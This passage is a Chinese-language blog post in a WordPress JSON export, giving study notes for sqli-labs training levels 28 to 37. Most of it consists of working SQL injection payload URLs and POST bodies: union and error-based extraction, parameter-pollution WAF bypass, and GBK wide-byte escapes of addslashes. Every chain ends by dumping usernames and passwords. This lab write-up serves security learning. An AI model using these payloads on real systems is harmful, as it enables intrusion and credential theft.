id=\"less-28\"><strong>Less 28 <\/strong><\/h1>\n<p><strong>GET – Error Based- All your UNION & SELECT belong to us String-Single quote with parenthesis\u57fa\u4e8e\u9519\u8bef\u7684\uff0c\u6709\u62ec\u53f7\u7684\u5355\u5f15\u53f7\u5b57\u7b26\u578b\uff0c\u8fc7\u6ee4\u4e86union\u548cselect\u7b49\u7684\u6ce8\u5165<\/strong><\/p>\n<p>\u8fd9\u91cc union \u548c select \u8fd9\u91cc\u53ef\u4ee5\u4f7f\u7528\u53cc\u5199\u5d4c\u5957\u5927\u5c0f\u5199\u7ed5\u8fc7\uff0c\u8fc7\u6ee4\u4e86\u6ce8\u91ca\u7684\u8bdd \u5c31\u4f7f\u7528\u95ed\u5408\u7ed5\u8fc7\uff0c\u8fc7\u6ee4\u4e86\u7a7a\u683c\u4f7f\u7528 Less-26 \u7684\u7f16\u7801\u7ed5\u8fc7<\/p>\n<p>\u66b4\u4f4d\u7f6e<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-28\/?id=0') uniOn sElect 1,2,3 && ('1')=('1\n\nhttps:\/\/daishen.ltd:1112\/Less-28\/?id=0')%a0uniOn%a0sElect%a01,2,3%a0%26%26%a0('1')=('1\n<\/code><\/pre>\n<p>\u66b4\u5e93<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-28\/?id=0') uniOn sElect 1,database(),3 && ('1')=('1\n\nhttps:\/\/daishen.ltd:1112\/Less-28\/?id=0')%a0uniOn%a0sElect%a01,database(),3%a0%26%26%a0('1')=('1\n<\/code><\/pre>\n<p>\u66b4\u8868<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-28\/?id=0') uniOn sElect 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() && ('1')=('1\n\nhttps:\/\/daishen.ltd:1112\/Less-28\/?id=0')%a0uniOn%a0sElect%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema=database()%a0%26%26%a0('1')=('1\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-28\/?id=0') uniOn sElect 1,group_concat(column_name),3 from information_schema.columns where table_name='users' && ('1')=('1\n\nhttps:\/\/daishen.ltd:1112\/Less-28\/?id=0')%a0uniOn%a0sElect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0%26%26%a0('1')=('1\n<\/code><\/pre>\n<p>\u66b4\u503c<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-28\/?id=0') uniOn sElect 1,group_concat(username,0x3a,password),3 from users where ('1')=('1\n\nhttps:\/\/daishen.ltd:1112\/Less-28\/?id=0')%a0uniOn%a0sElect%a01,group_concat(username,0x3a,password),3%a0from%a0users%a0where%a0('1')=('1\n<\/code><\/pre>\n<h1 id=\"less-28a\"><strong>Less 28a <\/strong><\/h1>\n<p><strong>GET – Bind Based- All your UNION & SELECT belong to us String-Single quote with parenthesis\u57fa\u4e8e\u76f2\u6ce8\u7684\uff0c\u6709\u62ec\u53f7\u7684\u5355\u5f15\u53f7\u5b57\u7b26\u578b\uff0c\u8fc7\u6ee4\u4e86union\u548cselect\u7b49\u7684\u6ce8\u5165<\/strong><\/p>\n<p>\u4e0e\u4e0a\u9898Less-28a\u5dee\u4e0d\u591a\uff0c\u4e5f\u53ef\u4ee5\u7528\u8054\u5408\u67e5\u8be2\u66b4\u51fa\u6570\u636e<\/p>\n<h1 id=\"less-29\"><strong>Less 29 <\/strong><\/h1>\n<p>GET -Error based- IMPIDENCE MISMATCH- Having a WAF in front of web application.<br \/>\n\u57fa\u4e8e\u83b7\u53d6\u9519\u8bef\u7684-IMPIDENCE\u5931\u914d-\u5728Web\u5e94\u7528\u7a0b\u5e8f\u524d\u9762\u6709\u4e00\u4e2aWAF\u3002<\/p>\n<h3 id=\"indexphp\">index.php<\/h3>\n<p>\u66b4\u4f4d\u7f6e<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-29\/?id=1&id=0' union select 1,2,3 --+\n<\/code><\/pre>\n<p>\u66b4\u5e93<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-29\/?id=1&id=0'' union select 1,2,database() --+\n<\/code><\/pre>\n<p>\u7206\u8868<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-29\/?id=1&id=0'' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-29\/?id=1&id=0'' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+\n<\/code><\/pre>\n<p>\u66b4\u503c<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-29\/?id=1&id=0' union select 1,2,group_concat(username,0x3a,password) from users --+\n<\/code><\/pre>\n<p>waf\u7ed5\u8fc7\u65b9\u6cd5<\/p>\n<p>waf\u662f\u53ea\u5141\u8bb8\u8f93\u5165\u6570\u5b57\u7684\uff0c\u6211\u4eec\u5728\u8f93\u5165\u6570\u5b57\u7684\u65f6\u5019\u5148\u7ed9waf\u770b\u7136\u540e\u68c0\u6d4b\u6b63\u5e38\u540e\u624d\u8f6c\u53d1\u7ed9\u6211\u4eec\u9700\u8981\u8bbf\u95ee\u7684\u9875\u9762\uff0c\u5f042\u4e2a\u503c\uff0c\u4e00\u4e2a\u662f\u7528\u6765\u6b3a\u9a97waf\u7684\u3002\u53e6\u4e00\u4e2a\u624d\u662f\u7ed9\u6211\u4eec\u9700\u8981\u8bbf\u95ee\u9875\u9762\u7684<\/p>\n<h3 id=\"loginphp\">login.php<\/h3>\n<ul>\n<li><code>login.php<\/code><\/li>\n<\/ul>\n<pre><code class=\"language-php\" lang=\"php\"># \u67e5\u8be2 query \u7684\u5b57\u7b26\u4e32\n$qs = $_SERVER['QUERY_STRING'];\n\n# \u6a21\u62df tomcat \u7684\u67e5\u8be2\u51fd\u6570 \u5904\u7406\u4e00\u4e0b\n$id1=java_implimentation($qs);\n$id=$_GET['id'];\n\n# \u518d\u6b21\u8fc7\u6ee4\u68c0\u6d4b\nwhitelist($id1);\n\n$sql=\"SELECT * FROM users WHERE id='$id' LIMIT 0,1\";\n\nif \u67e5\u8be2\u5230\u7ed3\u679c:\n \u8f93\u51fa\u67e5\u8be2\u7684\u8be6\u7ec6\u4fe1\u606f\nelse:\n print_r(mysql_error());\n?>\n\nfunction java_implimentation($query_string)\n{\n $q_s = $query_string;\n # & \u4f5c\u4e3a\u5206\u9694\u7b26 \u5206\u5272\u5b57\u7b26\u4e32\n $qs_array= explode(\"&\",$q_s);\n\n # \u904d\u5386 qs_array \u6570\u7ec4\n foreach($qs_array as $key => $value)\n { \n $val=substr($value,0,2);\n # \u5982\u679c\u6570\u7ec4\u524d\u4e24\u4f4d\u662f id \u7684\u8bdd\n if($val==\"id\")\n { \n # \u622a\u53d6 $value \u76843-30 \u7684\u5b57\u7b26\u4e32 \u4f5c\u4e3a id \u7684\u503c \n $id_value=substr($value,3,30); \n return $id_value;\n echo \"<br>\";\n break;\n }\n }\n}\n\nfunction whitelist($input)\n{\n # \u8fc7\u6ee4\u89c4\u5219 \u68c0\u6d4b\u6570\u5b57\n $match = preg_match(\"\/^\\d+$\/\", $input);\n if \u4e0d\u7b26\u5408\u89c4\u5219\uff1a\n header('Location: hacked.php');\n}\n<\/code><\/pre>\n<p>\u4ece\u4ee3\u7801\u4e2d\u8fd8\u662f\u5f88\u5bb9\u6613\u53d1\u73b0\u95ee\u9898\u7684\uff0c\u5173\u952e\u95ee\u9898\u51fa\u5728\u4e0b\u9762\u7684\u5730\u65b9\uff1a<\/p>\n<pre><code class=\"language-php\" lang=\"php\">$id1=java_implimentation($qs);\n...\nwhitelist($id1);\nwhitelist` \u8fc7\u6ee4\u662f\u6bd4\u8f83\u4e25\u683c\u7684\uff0c\u5982\u679c id \u4e0d\u662f\u6570\u5b57\u7684\u8bdd\u5c31\u4f1a\u76f4\u63a5\u91cd\u5b9a\u5411\u5230 `hacked.php`\uff0c\u8fd9\u91cc\u662f\u6ca1\u6bdb\u75c5\u7684\u3002\u90a3\u4e48\u95ee\u9898\u51fa\u5728\u4e86\u8fd9\u91cc\u51fd\u6570`$id1=java_implimentation($qs);\n<\/code><\/pre>\n<p>\u56e0\u4e3a return \u8868\u793a\u4e86\u51fd\u6570\u7684\u7ed3\u675f\u8fd0\u884c\uff0c\u6240\u4ee5\u8fd9\u4e2a\u51fd\u6570\u6355\u6349\u5230 id \u7684\u65f6\u5019\u5c31\u4f1a\u8fd4\u56de <code>return $id_value<\/code>\uff0c\u8fd9\u6837\u5c31\u5bfc\u81f4\u4e86 \u7528\u6237\u52a0\u5165\u6784\u9020\u4e24\u7ec4 id \u7684\u8bdd\uff0c\u90a3\u4e48\u540e\u9762\u7684 id \u5c31\u4f1a\u7ed5\u8fc7\u51fd\u6570\u68c0\u6d4b\u3002<\/p>\n<p>\u5047\u8bbe\u7528\u6237\u8f93\u5165\u8fd9\u6837\u7684\u8bed\u53e5\uff1a<\/p>\n<pre><code class=\"language-php\" lang=\"php\">index.php?id=1&id=2\n<\/code><\/pre>\n<p>Apache PHP \u4f1a\u89e3\u6790\u6700\u540e\u4e00\u4e2a\u53c2\u6570<\/p>\n<p>Tomcat JSP \u4f1a\u89e3\u6790\u7b2c\u4e00\u4e2a\u53c2\u6570<\/p>\n<p>\u77e5\u9053\u8fd9\u4e2a\u539f\u7406\u7684\u8bdd\u540e\u9762\u5c1d\u8bd5\u76f4\u63a5\u6ce8\u5165\u5427\uff1a<\/p>\n<pre><code class=\"language-payload\" lang=\"payload\">login.php?id=1&id=-2' union select 1,2,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+users)--+\n<\/code><\/pre>\n<p>(\u6709\u70b9\u61f5\uff0c\u76f4\u63a5\u8d34\u56fd\u5149\u5927\u4f6c\u7684\u539f\u8bdd)<\/p>\n<h1 id=\"less-30\">Less 30<\/h1>\n<p>GET – BLIND – IMPIDENCE MISMATCH- Having a WAF in front of web application.<br \/>\nGET-\u76f2\u6ce8-IMPIDENCE\u4e0d\u5339\u914d-\u6709\u4e00\u4e2aWAF\u5728\u524d\u9762\u7684Web\u5e94\u7528\u7a0b\u5e8f\u3002<\/p>\n<p>\u548c Less-29 \u76f8\u6bd4\u6ca1\u6709\u5565\u672c\u8d28\u53d8\u5316\uff0c\u53ea\u662f\u62fc\u63a5\u65b9\u5f0f\u6362\u6210\u4e86id=1&id=0″<\/p>\n<h1 id=\"less-31\">Less-31<\/h1>\n<p>\u52a0\u5355\u5f15\u53f7–\u672a\u62a5\u9519<\/p>\n<p>\u52a0\u53cc\u5f15\u53f7–\u62a5\u9519<\/p>\n<p>\u5c1d\u8bd5\u53cc\u5f15\u53f7+\u53f3\u62ec\u53f7 \u201d) \u518d\u52a0\u6ce8\u91ca — \u672a\u62a5\u9519<\/p>\n<p>\u548c Less-29 \u76f8\u6bd4\u6ca1\u6709\u5565\u672c\u8d28\u53d8\u5316\uff0c\u53ea\u662f\u62fc\u63a5\u65b9\u5f0f\u6362\u6210\u4e86id=1&id=0″ \uff09<\/p>\n<h1 id=\"less-32\">Less-32<\/h1>\n<p><strong>\u5bbd\u5b57\u8282\u6ce8\u5165\u539f\u7406<\/strong><\/p>\n<p>MySQL \u5728\u4f7f\u7528 GBK \u7f16\u7801\u7684\u65f6\u5019\uff0c\u4f1a\u8ba4\u4e3a\u4e24\u4e2a\u5b57\u7b26\u4e3a\u4e00\u4e2a\u6c49\u5b57\uff0c\u4f8b\u5982 <code>%aa%5c<\/code> \u5c31\u662f\u4e00\u4e2a \u6c49\u5b57\u3002\u56e0\u4e3a\u8fc7\u6ee4\u65b9\u6cd5\u4e3b\u8981\u5c31\u662f\u5728\u654f\u611f\u5b57\u7b26\u524d\u9762\u6dfb\u52a0 \u53cd\u659c\u6760 <code>\\<\/code>\uff0c\u6240\u4ee5\u8fd9\u91cc\u60f3\u529e\u6cd5\u5e72\u6389\u53cd\u659c\u6760\u5373\u53ef\u3002<\/p>\n<ol start=\"\">\n<li><code>%df<\/code> \u5403\u6389 <code>\\<\/code><\/li>\n<\/ol>\n<p>\u5177\u4f53\u7684\u539f\u56e0\u662f <code>urlencode(\\') = %5c%27<\/code>\uff0c\u6211\u4eec\u5728<code>%5c%27<\/code> \u524d\u9762\u6dfb\u52a0<code>%df<\/code>\uff0c\u5f62 \u6210<code>%df%5c%27<\/code>\uff0cMySQL \u5728 GBK \u7f16\u7801\u65b9\u5f0f\u7684\u65f6\u5019\u4f1a\u5c06\u4e24\u4e2a\u5b57\u8282\u5f53\u505a\u4e00\u4e2a\u6c49\u5b57\uff0c\u8fd9\u4e2a\u65f6\u5019\u5c31\u628a<code>%df%5c<\/code> \u5f53\u505a\u662f\u4e00\u4e2a\u6c49\u5b57\uff0c<code>%27<\/code> \u5219\u4f5c\u4e3a\u4e00\u4e2a\u5355\u72ec\u7684\u7b26\u53f7\u5728\u5916\u9762\uff0c\u540c\u65f6\u4e5f\u5c31\u8fbe\u5230\u4e86\u6211\u4eec\u7684\u76ee\u7684\u3002<\/p>\n<p>2.\u5c06 <code>\\'<\/code> \u4e2d\u7684 <code>\\<\/code> \u8fc7\u6ee4\u6389<\/p>\n<p>\u4f8b\u5982\u53ef\u4ee5\u6784\u9020 <code>%5c%5c%27<\/code> \u7684\u60c5\u51b5\uff0c\u540e\u9762\u7684<code>%5c<\/code>\u4f1a\u88ab\u524d\u9762\u7684<code>%5c<\/code> \u7ed9\u6ce8\u91ca\u6389\u3002\u8fd9\u4e5f\u662f bypass \u7684\u4e00\u79cd\u65b9\u6cd5\u3002<\/p>\n<p>\u672c\u5173\u5361\u91c7\u7528\u7b2c\u4e00\u79cd %df \u5bbd\u5b57\u8282\u6ce8\u5165\u6765\u5403\u6389\u53cd\u659c\u6760<\/p>\n<p>\u66b4\u4f4d\u7f6e<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-32\/?id=-1%df' union select 1,2,3 --+\n<\/code><\/pre>\n<p>\u66b4\u5e93\u548c\u7248\u672c<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-32\/?id=-1%df' union select 1,version(),database() --+\n<\/code><\/pre>\n<p>\u66b4\u8868<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-32\/?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<p><strong>\u4f7f\u7528\u5341\u516d\u8fdb\u5236\u7f16\u7801\u5c31\u53ef\u4ee5\u7ed5\u8fc7\u4e86”\u4f7f\u75280x \u4ee3\u66ff\uff0cusers \u4f7f\u7528\u5341\u516d\u8fdb\u5236\u7f16\u7801\u5f97\u52307573657273\uff0c\u6784\u9020\u4e3a0x7573657273<\/strong><\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-32\/?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+\n<\/code><\/pre>\n<p>\u66b4\u503c<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-32\/?id=-1%df' union select 1,2,group_concat(username,0x3a,password) from users --+\n<\/code><\/pre>\n<h1 id=\"less-33\">Less-33<\/h1>\n<p>\u62fc\u63a5\u65b9\u5f0f\u4e5f\u662f\u4e00\u6837\u7684\uff0c\u8fc7\u6ee4\u65b9\u6cd5\u7ec6\u8282\u6709\u70b9\u53d8\u5316\uff0c\u5177\u4f53\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-php\" lang=\"php\">function check_addslashes($string)\n{\n $string= addslashes($string); \n return $string;\n}\n<\/code><\/pre>\n<p><code>addslashes()<\/code> \u51fd\u6570\u8fd4\u56de\u5728\u9884\u5b9a\u4e49\u5b57\u7b26\u4e4b\u524d\u6dfb\u52a0\u53cd\u659c\u6760\u7684\u5b57\u7b26\u4e32\u3002<\/p>\n<figure>\n<table>\n<thead>\n<tr>\n<th style=\"text-align:left;\">\u9884\u5b9a\u4e49\u5b57\u7b26<\/th>\n<th style=\"text-align:left;\">\u8f6c\u4e49\u540e<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align:left;\"><code>\\<\/code><\/td>\n<td style=\"text-align:left;\"><code>\\\\<\/code><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align:left;\"><code>'<\/code><\/td>\n<td style=\"text-align:left;\"><code>\\'<\/code><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align:left;\"><code>\"<\/code><\/td>\n<td style=\"text-align:left;\"><code>\\\"<\/code><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p>\u8be5\u51fd\u6570\u53ef\u7528\u4e8e\u4e3a\u5b58\u50a8\u5728\u6570\u636e\u5e93\u4e2d\u7684\u5b57\u7b26\u4e32\u4ee5\u53ca\u6570\u636e\u5e93\u67e5\u8be2\u8bed\u53e5\u51c6\u5907\u5b57\u7b26\u4e32\uff0c\u548c Less-32 \u7684\u51fd\u6570\u529f\u80fd\u662f\u5dee\u4e0d\u7684\uff0c\u4f9d\u65e7\u53ef\u4ee5\u4f7f\u7528\u5bbd\u5b57\u8282\u8fdb\u884c\u6ce8\u5165\u3002<\/p>\n<blockquote><p>\u6ce8\u5165\u5929\u4e66\uff1a\u4f7f\u7528 addslashes(),\u6211\u4eec\u9700\u8981\u5c06 mysql_query \u8bbe\u7f6e\u4e3a binary \u7684\u65b9\u5f0f\uff0c\u624d\u80fd\u9632\u5fa1\u6b64\u6f0f\u6d1e<\/p><\/blockquote>\n<h1 id=\"less-34\">Less-34<\/h1>\n<p><strong>\u5bbd\u5b57\u8282post\u6ce8\u5165<\/strong><\/p>\n<h3 id=\"\u8054\u5408\u6ce8\u5165-2\">\u8054\u5408\u6ce8\u5165\uff1a<\/h3>\n<p>\u8fc7\u6ee4\u65b9\u6cd5\u4f9d\u7136\u548c Less-33 \u4e00\u81f4\uff1a<\/p>\n<pre><code class=\"language-php\" lang=\"php\">$uname = addslashes($uname1);\n$passwd= addslashes($passwd1);\n<\/code><\/pre>\n<p>\u53ea\u662f\u7531 GET \u578b\u53d8\u6210\u4e86 POST \u578b<\/p>\n<p>\u66b4\u4f4d\u7f6e<\/p>\n<pre><code>uname=-admin%df' union select 1,2 --+&passwd=admin&submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u5e93\u548c\u7248\u672c<\/p>\n<pre><code>uname=-admin%df' union select version(),database() --+&passwd=admin&submit=Submit\n<\/code><\/pre>\n<p>\u7206\u8868<\/p>\n<pre><code>uname=-admin%df' union select 2,group_concat(table_name) from information_schema.tables where table_schema=database() --+&passwd=admin&submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<p><strong>\u4f7f\u7528\u5341\u516d\u8fdb\u5236\u7f16\u7801\u5c31\u53ef\u4ee5\u7ed5\u8fc7\u4e86”\u4f7f\u75280x \u4ee3\u66ff\uff0cusers \u4f7f\u7528\u5341\u516d\u8fdb\u5236\u7f16\u7801\u5f97\u52307573657273\uff0c\u6784\u9020\u4e3a0x7573657273<\/strong><\/p>\n<pre><code>uname=-admin%df' union select 2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+&passwd=admin&submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u503c<\/p>\n<pre><code>uname=-admin%df' union select 2,group_concat(username,0x3a,password) from users --+&passwd=admin&submit=Submit\n<\/code><\/pre>\n<h3 id=\"\u62a5\u9519\u6ce8\u5165-1\">\u62a5\u9519\u6ce8\u5165<\/h3>\n<p>\u66b4\u5e93<\/p>\n<pre><code>uname=admin%df' and extractvalue(1,concat(0x23,database(),0x23))--+&passwd=admin&submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u8868<\/p>\n<pre><code>uname=admin%df' and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x23))--+&passwd=admin&submit=Submit\n\nuname=admin%df' and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema=database() limit 2,1),0x23))--+&passwd=admin&submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u5217\u540d<\/p>\n<p><strong>\u4f7f\u7528\u5341\u516d\u8fdb\u5236\u7f16\u7801\u5c31\u53ef\u4ee5\u7ed5\u8fc7\u4e86”\u4f7f\u75280x \u4ee3\u66ff\uff0cusers \u4f7f\u7528\u5341\u516d\u8fdb\u5236\u7f16\u7801\u5f97\u52307573657273\uff0c\u6784\u9020\u4e3a0x7573657273<\/strong><\/p>\n<pre><code>uname=admin%df' and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema=database() and table_name=0x7573657273 limit 1,1),0x23))--+&passwd=admin&submit=Submit\n\nuname=admin%df' and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema=database() and table_name=0x7573657273 limit 2,1),0x23))--+&passwd=admin&submit=Submit\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<pre><code>uname=admin%df' and extractvalue(1,concat(0x23,(select username from users order by id limit 2,1),0x23))--+&passwd=admin&submit=Submit\n<\/code><\/pre>\n<p> <\/p>\n<h1 id=\"less-35\">Less-35<\/h1>\n<p>\u52a0\u4e2a\u5355\u5f15\u53f7<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-35\/?id=1'\n<\/code><\/pre>\n<p>id\u5468\u56f4\u6ca1\u6709\u5355\u5f15\u53f7\u6216\u53cc\u5f15\u53f7\uff0c\u73b0\u5728\u5c31\u660e\u767d\u9898\u76ee\u7684\u6807\u9898\u4e86\uff0c\u4e0d\u9700\u8981\u8981\u8fc7\uff0c\u76f4\u63a5\u6ce8\u5165<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-35\/?id=-1%E3' union select 1,2,group_concat(username,0x3a,password) from users --+\n<\/code><\/pre>\n<h1 id=\"less-36\">Less-36<\/h1>\n<p>\u8fd9\u4e00\u5173\u4e3b\u8981\u8003\u67e5\u4e86 Bypass MySQL Real Escape String\uff0cmysql_real_escape_string \u4f1a\u68c0\u6d4b\u5e76\u8f6c\u4e49\u5982\u4e0b\u5371\u9669\u5b57\u7b26\uff1a<\/p>\n<figure>\n<table>\n<thead>\n<tr>\n<th style=\"text-align:left;\">\u5371\u9669\u5b57\u7b26<\/th>\n<th style=\"text-align:left;\">\u8f6c\u4e49\u540e<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align:left;\"><code>\\<\/code><\/td>\n<td style=\"text-align:left;\"><code>\\\\<\/code><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align:left;\"><code>'<\/code><\/td>\n<td style=\"text-align:left;\"><code>\\'<\/code><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align:left;\"><code>\"<\/code><\/td>\n<td style=\"text-align:left;\"><code>\\\"<\/code><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<h3 id=\"\u62a5\u9519\u6ce8\u5165-2\">\u62a5\u9519\u6ce8\u5165<\/h3>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-36\/?id=-1%df%27%20and%20extractvalue(1,concat(0x23,(select%20username%20from%20users%20order%20by%20id%20limit%202,1),0x23))--+\n<\/code><\/pre>\n<h3 id=\"\u8054\u5408\u6ce8\u5165-3\">\u8054\u5408\u6ce8\u5165<\/h3>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-36\/?id=-1%df%27%20union%20select%201,2,group_concat(username,0x3a,password)%20from%20users%20--+\n<\/code><\/pre>\n<h1 id=\"less-37\">Less-37<\/h1>\n<pre><code>uname=admin%df' and 1=2 union select 1,(SELECT GROUP_CONCAT(username,password SEPARATOR 0x3c62723e) FROM users)#&passwd=\n<\/code><\/pre>\n<p> <\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sqli-labs\u5b66\u4e60\u7b14\u8bb0Less_21-37 Less-21 Cookie Injection- Error […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-144","post","type-post","status-publish","format-standard","hentry","category-web"],"_links":{"self":[{"href":"https:\/\/www.daishen.ltd\/index.php?rest_route=\/wp\/v2\/posts\/144","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.daishen.ltd\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.daishen.ltd\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.daishen.ltd\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.daishen.ltd\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=144"}],"version-history":[{"count":1,"href":"https:\/\/www.daishen.ltd\/index.php?rest_route=\/wp\/v2\/posts\/144\/revisions"}],"predecessor-version":[{"id":146,"href":"https:\/\/www.daishen.ltd\/index.php?rest_route=\/wp\/v2\/posts\/144\/revisions\/146"}],"wp:attachment":[{"href":"https:\/\/www.daishen.ltd\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=144"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.daishen.ltd\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=144"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.daishen.ltd\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=144"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}